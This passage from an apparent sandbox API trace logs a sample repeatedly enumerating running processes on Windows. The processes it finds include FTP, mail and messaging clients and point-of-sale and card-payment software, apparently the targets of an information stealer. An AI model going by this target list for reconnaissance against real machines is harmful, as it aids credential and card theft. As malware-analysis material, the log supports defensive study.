th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0174.624] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0174.627] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0174.630] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0174.634] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0174.637] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0174.639] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0174.642] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0174.645] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0174.648] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0174.651] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0174.654] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0174.661] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0174.664] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0174.667] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0174.669] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0174.672] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0174.675] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0174.679] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0174.682] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0174.688] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0174.691] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0174.694] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0174.696] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0174.703] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0174.706] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0174.709] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0174.712] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0174.715] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0174.717] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0174.719] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0174.722] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0174.725] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0174.728] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0174.730] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0174.733] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0174.736] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0174.738] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0174.746] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0174.748] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0174.750] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0174.752] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0174.755] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0174.757] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0174.759] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0174.761] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0174.763] Process32Next (in: hSnapshot=0x19bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0174.765] CloseHandle (hObject=0x19bc) returned 1 [0174.765] Sleep (dwMilliseconds=0x64) [0174.877] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19b8 [0174.888] Process32First (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.890] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0174.892] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0174.893] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.895] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0174.898] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.901] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0174.902] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0174.904] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0174.906] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.908] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.910] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0174.912] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.962] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.964] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.967] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.969] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.972] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.973] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.976] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0174.978] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0174.980] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.982] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0174.984] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.986] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0174.988] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0174.989] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0174.991] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0174.993] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0174.995] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0175.004] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.006] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.008] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0175.012] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0175.014] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.016] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.018] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0175.019] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 